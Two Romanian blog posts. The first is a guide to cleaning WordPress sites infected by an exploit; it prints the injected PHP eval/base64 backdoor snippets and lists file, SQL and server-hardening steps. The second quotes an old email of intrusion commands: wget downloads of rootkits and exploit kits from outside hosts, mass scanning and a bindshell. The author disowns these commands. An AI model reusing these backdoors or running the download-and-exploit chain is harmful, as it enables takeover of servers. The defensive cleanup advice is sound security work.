WordPress Exploit – Curatare fisiere virusate, SQL si securizare server.

Inainte sa cititi acest post, trebuie sa vedeti postul de aici, ca sa intelegeti ceva. :)

Am gasit in mai multe fisiere ale blogurilor de pe stealthsettings.com, coduri asemanatoare cu cele de mai jos, aparute ca urmare a virusarii cu exploitul de WordPress.:

<?php if($_GET['573abcb060974771']==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['file'])); exit; } ?>

si

<?php if($_COOKIE['44e827f9fbeca184']==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['file'])); exit; } ?>

In cazul de mai sus este vorba despre fisierul xmlrpc.php de la Somnoros, dar la un grep pe server, se vede ca sunt destul de multe coduri de acest gen in surse.

Curatare fisiere infectate:

Ooookkkk…
1. Cea mai buna solutie, dupa ce este facut backup-ul si curatata baza de date, este sa stergeti fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt  atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE['44e827f9fbeca184']==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['file'])); exit; } ?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”

3. in /tmp , cautati si stergeti folderele de genul tmpYwbzT2

Curatare SQL :

1. in tabelul tabelul wp_options vedeti daca exista si stergeti liniile: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Tot in wp_options, mergeti la active_plugins si stergeti daca exista, un plugin care se termina intr-una din extensiile *_new.php, *_old.php, *.jpgg, *.giff, *.pngg sau daca este alta extensie suspecta, verificati cu atentie.

3. In tabelul wp_users, vedeti daca exista un user care nu are scris nimic in dreptul lui, pe coloana user_nicename. Stergeti acest user, dar retineti numarul de pe coloana ID. Acest user este posibil sa foloseasca “WordPress” ca user_login si apare ca este creat la data de 00:00:00 0000-00-00 .

4. Mergeti in tabelul wp_usermeta si stergeti toate liniile care apartin ID-ului de mai sus.

Dupa ce ati facut aceasta curatare de sql, dezactivati si apoi activati un plugin oarecare. (in blog –> Dashboard –> Plugins)

Securizare server:

1. Vedeti ce directoare si fisiere sunt “writable” (chmod 777) si incercati sa puneti pe ele un chmod care sa nu mai permita scrierea lor de la orice nivel. (chmod 644, de exemplu)

find . -perm -2 –ls

2. Vedeti ce fisiere au setat bit-ul suid sau sgid . Daca nu utilizati acele fisiere puneti pe ele chmod 0 sau dezinstalati pachetul care le contine. Sunt foarte periculoase, pentru ca ele executa cu privilegiile “group” sau “root” si nu cu privilegiile utilizatorului normal care executa acel fisier.

find / -type f -perm -04000 -ls
find / -type f -perm -02000 -ls

3. Verificati ce porturi sunt deschise si incercati sa inchideti sau sa securizati pe cele care nu sunt folosite.

netstat -an | grep -i listen

Cam atat. Vad ca unele bloguri sunt banate de Google Search si altii spun “Bine le-a facut!!!” . Pai bine le-o fi facut…dar ce spuneti daca incepe google sa baneze toate site-urile care fac  SE SPAM si baga troieni (Trojan.Clicker.HTML)  in cookies?

E-mail - reminder

O noua zi de luni, un nou inceput de saptamana care nu anunta nimic spectaculos deocamdata. M-am trezit destul de tarziu si ca de obicei, imi deschid pc-ul si citesc mail-urile in compania unei cafele :-) . Nimic interesant in inbox. Mi-am aruncat privirea la spatiul ocupat pe yahoo si am fost putin surprins … 22% of 1GB. Multe mail-uri pastrate prin foldere care nu au fost deschise decat odata si asta in urma cu mult timp.

Am facut putina ordine (care a durat mai bine de o ora), si am surpriza sa gasesc niste mail-uri salvate de mine de pe niste adrese mai vechi. Mergand din aproape in aproape si incercand minute bune sa-mi aduc aminte parolele de la vechile casute de e-mail (ce mai mare prostie sa-ti schimbi o adresa de e-mail), am vazut un mail cu subiectul ROOT ! DOAMNEEEE ! ce minte aveam acum cativa ani si ce era de capul meu ! Hacker nu gluma ! :-)
Extras dintr-un mail:

To: rootXXX@yahoo.com, XXXX@i-cs.ro, XXX@yahoo.com
Subject: #root
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
Content-Length: 1380
tar vf smb.tar.gz
cd smb
./start Clasa
wget www.awayms.as.ro/rewt.tgz
wget geocities.com/alinsimadi/china.tar.gz
wget www.linuxm.as.ro/x1.tgz | tar zxvf x1.tgz |
cd atd | ./mass -s 800
dupa ce prinzi ./osslmass2 mass.log
scan.tgz | cd new | ./scan ip ( samba)
wget www.linuxm.as.ro/bind.tgz | tar zxvf
bind.tgz | ./b2 | bind pentru
apache port telnet 3130
wget www.linuxm.as.ro/rk.tar.gz | tar zxvf
[....]

Sper sa nu le mai foloseasca nimeni in ziua de azi, mai ales ca scopul lor era cat se poate de “war” si consecintele “dureroase” atat pentru instituriile care au fost sparte cat si pentru pentru “atacator” daca este prins. NU se merita sa spargi un server pentru o tampenie de psyBNC (mIRC) sau pentru simpla “pasiune”.
Din simpla curiozitate totusi am vrut sa verific ceva. Am gasit cateva dns-uri care au fost sparte si constat ca nici astazi institutii din US nu sunt securizate si pot pica prada in orice moment unui copil dintr-o sala de net. Chiar nu inteleg…Universatile din Chicago (Loyola si UCLA), chiar nu au bani de investit in securitate, nu au resurse umane capabile sa securizeze un linux sau nu sunt interesati?
En fine … bine ca mi-am gasit alte preocupari. Adio I24 !